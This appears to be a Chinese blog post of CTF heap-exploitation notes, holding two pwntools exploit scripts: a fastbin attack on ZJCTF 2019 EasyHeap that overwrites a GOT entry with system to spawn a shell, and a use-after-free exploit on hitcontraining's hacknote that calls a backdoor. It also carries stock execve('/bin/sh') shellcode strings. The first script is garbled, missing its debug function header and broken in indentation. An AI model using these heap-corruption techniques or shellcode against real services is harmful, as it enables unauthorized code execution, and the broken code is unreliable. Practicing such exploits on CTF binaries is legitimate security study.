• heap做题记录


    [ZJCTF 2019]EasyHeap


    debug_str = ""
    if PIE:
    text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
    for i in addr:
    debug_str+='b *{}\n'.format(hex(text_base+i))
    gdb.attach(p,debug_str)
    else:
    for i in addr:
    debug_str+='b *{}\n'.format(hex(i))
    gdb.attach(p,debug_str)

    def dbg():
        """Attach gdb to the global process ``p`` with no breakpoint script."""
        target = p
        gdb.attach(target)
    #-----------------------------------------------------------------------------------------
    def s(data):
        """Send ``str(data)`` to ``p`` (so an int is accepted as well)."""
        return p.send(str(data))

    def sa(delim, data):
        """Wait for ``delim`` on ``p``, then send ``str(data)``."""
        return p.sendafter(str(delim), str(data))

    def sl(data):
        """Send ``str(data)`` followed by a newline."""
        return p.sendline(str(data))

    def sla(delim, data):
        """Wait for ``delim``, then send ``str(data)`` plus a newline."""
        return p.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        """Receive up to ``numb`` bytes from ``p``."""
        return p.recv(numb)

    def ru(delims, drop=True):
        """Receive until ``delims``; ``drop`` controls whether the delimiter is kept."""
        return p.recvuntil(delims, drop)

    def it():
        """Hand the process over to an interactive session."""
        return p.interactive()

    def uu32(data):
        """Unpack ``data`` as a little-endian u32, zero-padding short input."""
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        """Unpack ``data`` as a little-endian u64, zero-padding short input."""
        return u64(data.ljust(8, '\0'))

    def bp(bkp):
        """Forward a breakpoint request to ``pdbg``.

        NOTE(review): ``pdbg`` is not defined anywhere in the visible file, so
        calling this raises NameError unless it is provided elsewhere.
        """
        return pdbg.bp(bkp)

    def li(str1, data1):
        """Log ``str1`` and ``data1`` (as hex) as a success line."""
        return log.success(str1 + '========>' + hex(data1))


    def dbgc(addr):
        """Attach gdb to ``p``, set one breakpoint at ``addr`` and continue."""
        script = "b*" + hex(addr) + "\n c"
        gdb.attach(p, script)

    def lg(s,addr):
        """Print ``s`` right-aligned to 20 columns and ``addr`` as hex, in bold red on black."""
        label = '%20s' % (s,)
        value = '0x%x' % (addr,)
        print('\033[1;31;40m' + label + '-->' + value + '\033[0m')

    # Stock shellcode strings kept for reference only: exp() below never
    # references them. The numeric suffix is the byte length of each literal.
    # These appear to be Python 2 ``str`` literals (the script sends ``str(...)``
    # payloads and uses ``'\0'`` padding); under Python 3 they would be text,
    # not bytes, so they are not a drop-in for a Python 3 run.
    sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
    #https://www.exploit-db.com/shellcodes
    #-----------------------------------------------------------------------------------------

    def choice(idx):
        """Answer the ``choice :`` menu prompt with option ``idx`` (``sa`` stringifies it)."""
        sa("choice :", idx)

    def add(sz,context):
        """Menu option 1: answer the size prompt with ``sz`` and the content prompt with ``context``."""
        choice(1)
        replies = (("Size of Heap : ", sz), ("Content of heap:", context))
        for prompt, answer in replies:
            sa(prompt, answer)

    def edit(idx,sz,con):
        """Menu option 2: send index ``idx``, size ``sz`` and new content ``con`` in prompt order."""
        choice(2)
        replies = (
            ("Index :", idx),
            ("Size of Heap : ", sz),
            ("Content of heap : ", con),
        )
        for prompt, answer in replies:
            sa(prompt, answer)

    def delete(idx):
        """Menu option 3: answer the index prompt with ``idx``."""
        choice(3)
        sa("Index :", idx)


    def exp():
        """Run the scripted menu interaction against the EasyHeap target.

        Drives the binary through the module-level ``add``/``edit``/``delete``
        helpers and the global process ``p``. Every address below is a
        hard-coded literal -- nothing is leaked or computed at runtime -- so
        the sequence only matches the exact binary it was written against
        (presumably a non-PIE build; re-derive the values if the binary differs).
        """
        add(0x60,"a")#ck0
        add(0x60,"b")#ck1
        add(0x60,"c")#ck2,split
        delete(1)#fastbin[0]->ck1->null
        edit(0,0x78,'d'*0x68+p64(0x71)+p64(0x6020AD))  # 0x6020AD is hard-coded for this binary
        add(0x60,'e')#ck1
        add(0x60,"f"*3+p64(9999))#ck3
        p.sendline("4869")
        time.sleep(1)  # fixed delay instead of waiting for a prompt; timing-dependent under load
        p.sendline(p64(1))
        add(0x50,"a")#ck4
        add(0x50,"b")#ck5
        add(0x50,"c")#ck6,split
        delete(5)#fastbin[0]->ck5->null
        edit(4,0x68,'d'*0x58+p64(0x61)+p64(0x601ffa))  # 0x601ffa is hard-coded for this binary
        add(0x50,'/bin/sh\x00')#ck5
        system_addr=0x400700  # hard-coded, not resolved from the ELF at runtime
        add(0x50,"f"*14+p64(system_addr))#ck3 ->got
        delete(5)

    if __name__ == '__main__':
        # Run the scripted interaction, then drop into the interactive session.
        exp()
        it()

    hitcontraining_uaf

    from pwn import *
    import time
    # Verbose traffic logging plus a tmux side pane for gdb attach.
    context.terminal=['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    prog = './hacknote'
    #elf = ELF(prog)#nc 121.36.194.21 49155

    # Local target with the bundled libc forced in via LD_PRELOAD.
    p = process(prog,env={"LD_PRELOAD":"./libc-2.23.so"})
    # Parsed but not referenced by exp() below.
    libc = ELF("libc-2.23.so")
    #p = remote("node4.buuoj.cn",28453)#nc 124.71.130.185 49155
    #p = remote("node4.buuoj.cn",28453)#nc 124.71.130.185 49155
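    def debug(addr,PIE=True):
        """Attach gdb to the global process ``p`` with one breakpoint per address.

        Args:
            addr: iterable of breakpoint addresses.
            PIE: when True each address is an offset and is added to the text
                base read from the second line of ``pmap <pid>``; when False
                the addresses are used as given.

        Raises:
            IndexError: if ``pmap`` printed fewer than two lines.
            ValueError: if the first column of that line is not hex.
        """
        if PIE:
            # Line index 1 (after pmap's header) is taken as the text base. The
            # pipe is closed explicitly instead of being left to the GC.
            with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as pmap_out:
                text_base = int(pmap_out.readlines()[1], 16)
        else:
            text_base = 0
        # One "b *<addr>" line per breakpoint; a single attach call serves both modes.
        script = "".join('b *{}\n'.format(hex(text_base + i)) for i in addr)
        gdb.attach(p, script)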

    def dbg():
        """Attach gdb to the global process ``p`` with no breakpoint script."""
        target = p
        gdb.attach(target)
    #-----------------------------------------------------------------------------------------
    def s(data):
        """Send ``str(data)`` to ``p`` (so an int is accepted as well)."""
        return p.send(str(data))

    def sa(delim, data):
        """Wait for ``delim`` on ``p``, then send ``str(data)``."""
        return p.sendafter(str(delim), str(data))

    def sl(data):
        """Send ``str(data)`` followed by a newline."""
        return p.sendline(str(data))

    def sla(delim, data):
        """Wait for ``delim``, then send ``str(data)`` plus a newline."""
        return p.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        """Receive up to ``numb`` bytes from ``p``."""
        return p.recv(numb)

    def ru(delims, drop=True):
        """Receive until ``delims``; ``drop`` controls whether the delimiter is kept."""
        return p.recvuntil(delims, drop)

    def it():
        """Hand the process over to an interactive session."""
        return p.interactive()

    def uu32(data):
        """Unpack ``data`` as a little-endian u32, zero-padding short input."""
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        """Unpack ``data`` as a little-endian u64, zero-padding short input."""
        return u64(data.ljust(8, '\0'))

    def bp(bkp):
        """Forward a breakpoint request to ``pdbg``.

        NOTE(review): ``pdbg`` is not defined anywhere in the visible file, so
        calling this raises NameError unless it is provided elsewhere.
        """
        return pdbg.bp(bkp)

    def li(str1, data1):
        """Log ``str1`` and ``data1`` (as hex) as a success line."""
        return log.success(str1 + '========>' + hex(data1))


    def dbgc(addr):
        """Attach gdb to ``p``, set one breakpoint at ``addr`` and continue."""
        script = "b*" + hex(addr) + "\n c"
        gdb.attach(p, script)

    def lg(s,addr):
        """Print ``s`` right-aligned to 20 columns and ``addr`` as hex, in bold red on black."""
        label = '%20s' % (s,)
        value = '0x%x' % (addr,)
        print('\033[1;31;40m' + label + '-->' + value + '\033[0m')

    # Stock shellcode strings kept for reference only: exp() below never
    # references them. The numeric suffix is the byte length of each literal.
    # These are Python 2 ``str`` literals (the script calls ``raw_input()``);
    # under Python 3 they would be text, not bytes, so they are not a drop-in
    # for a Python 3 run.
    sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
    #https://www.exploit-db.com/shellcodes
    #-----------------------------------------------------------------------------------------

    def choice(idx):
        """Answer the ``choice :`` menu prompt with option ``idx`` (``sa`` stringifies it)."""
        sa("choice :", idx)

    def add(sz,context):
        """Menu option 1: answer the size prompt with ``sz`` and the content prompt with ``context``."""
        choice(1)
        replies = (("Note size :", sz), ("Content :", context))
        for prompt, answer in replies:
            sa(prompt, answer)

    def delete(idx):
        """Menu option 2: answer the index prompt with ``idx``."""
        choice(2)
        sa("Index :", idx)

    def show(idx):
        """Menu option 3: answer the index prompt with ``idx``."""
        choice(3)
        sa("Index :", idx)

    def exp():
        """Run the scripted add/delete/add/show sequence against the hacknote target.

        Uses the module-level ``add``/``delete``/``show`` helpers and the global
        process ``p``. ``backdoor_addr`` is a hard-coded literal for this exact
        binary and is not derived at runtime.
        """
        add(0x40,'aaaa')#H0 to give more fastbin[0],ck0,ck1
        add(0x40,'bbbb')#H1 to give more fastbin[0],ck2,ck3
        delete(0)
        delete(1)
        raw_input()  # Python 2 only; blocks until Enter (presumably a pause to attach a debugger)
        backdoor_addr=0x8048945  # hard-coded; re-derive if the binary differs
        add(8,p32(backdoor_addr))
        show(0)


    if __name__ == '__main__':
        # Run the scripted interaction, then drop into the interactive session.
        exp()
        it()

  • 原文地址:https://www.cnblogs.com/cnnnnnn/p/15823646.html